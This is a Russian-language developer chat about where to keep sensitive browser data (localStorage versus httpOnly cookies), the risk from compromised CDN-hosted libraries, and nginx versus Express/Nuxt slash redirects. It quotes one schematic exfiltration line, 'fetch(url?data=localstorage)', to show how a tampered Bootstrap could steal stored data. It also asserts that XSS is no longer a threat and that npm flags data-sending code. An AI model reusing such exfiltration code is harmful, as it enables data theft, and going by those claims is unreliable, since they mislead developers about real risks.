Нет, про привязку к айпи адресу

Ага, а заголовок гласит вообще не использовать. Видимо, автор думает, что все данные являются конфиденциальными

=)) это вам к автору, я тоже не согласен с заголовком

Против Вас ничего и не имею)

прочёл. Тут вопрос про xss, о взломе зависимостей, которым могут получить доступ через апи (взломали бутстрап, который вы поставили по cdn, и код там такой: fetch(url?data=localstorage)) — так и крадут данные. Но XSS давно уже не угроза (х
а про второе —да, действительно так могут. Вот если устанавливать всё через npm — не проблем, потому-что даже если и изменят код npm реагирует на отправку данных в коде, будет вам кричать: КАРАУЛ
(х

решать вам

но...
а где тогда хранить то данные (?

много интересного, и всё равно не понимаю где хранить то данные. если мы имеем доступ к данным — то и они имеют доступ

простите, не по теме. А я правильно воспринимаю node.js и настройки nginx — одним и тем же: програмированием сервера?

нет это разные вещи

Каким образом можно сделать так, чтобы все адреса, заканчивающиеся на слеш редиректились с 301 на адреса без слеша? (site.com/news/ -> site.com/news)?

Я попробовал этот вариант, но загвоздка в том, что я использую @nuxt/routerjs для формирования собственных роутов (дефолтные, увы, не угодили) и вот эта плашка с мидлваром не особо то и работает

Редиректы через бекенд/фронтенд не лучшая идея. Лучше настроить на NGINX

Почему это?)

Ну, кстати да
Но вдруг была бы какая-то опция в нуксте, где ты param: true и хоп, всё само заработало)

А подумать?

Захотелось скажем ботам дергать урл со слешем. И будут они делать два тычка в приложение вместо одного

ты изменил свое сообщение. Было написано через бекенд, теперь ты добавил бекенд/фронтенд.
Если не юзать редирект через express то тогда вообще express лучше не юзать.
А если юзаешь express то не всегда нужно делить  логику на nginx и express

К httpOnly кукам нет доступа из жса